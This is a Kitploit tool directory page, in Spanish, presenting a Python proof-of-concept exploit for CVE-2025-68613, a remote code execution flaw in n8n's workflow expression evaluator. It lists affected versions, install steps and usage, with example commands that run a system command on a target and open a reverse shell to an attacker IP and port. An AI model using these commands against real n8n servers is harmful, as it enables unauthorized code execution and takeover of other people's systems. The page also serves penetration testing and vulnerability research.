Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-68613-Python-Exploit — Exploit en Python para CVE-2025-68613. | Kitploit
Herramientas/GitHubGitHub/johanneslks/cve-2025-68613-python-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubjohanneslks/cve-2025-68613-python-exploit

CVE-2025-68613-Python-Exploit

Exploit en Python para CVE-2025-68613.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 6 mesesAún no revisado

CVE-2025-68613: RCE en Expresiones de Workflow de n8n

Exploit de prueba de concepto (PoC) para una vulnerabilidad crítica de ejecución remota de código en la plataforma de automatización de workflows de n8n.


Descripción

La vulnerabilidad reside en el sistema de evaluación de expresiones de n8n. Las expresiones proporcionadas por el usuario no están correctamente aisladas en un sandbox, lo que permite a atacantes autenticados ejecutar código arbitrario en el sistema host.

ID de CVE: CVE-2025-68613
Tipo de vulnerabilidad: Ejecución remota de código (RCE)
Componente: Evaluador de expresiones


Versiones afectadas

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

Instalación

root@kitploit:~
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

Uso

Sintaxis

root@kitploit:~
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

Argumentos

  • -t, --target : URL del objetivo (p. ej., http://localhost:5678)
  • -u, --username : Dirección de correo electrónico de la cuenta de n8n
  • -p, --password : Contraseña de la cuenta de n8n
  • -c, --cmd : Comando del sistema a ejecutar
  • --reverse-shell : Activa una reverse shell (Formato: IP PUERTO)

Ejemplos

Comprobar vulnerabilidad / Ejecutar comando:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"

Establecer reverse shell:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444
Descargar herramienta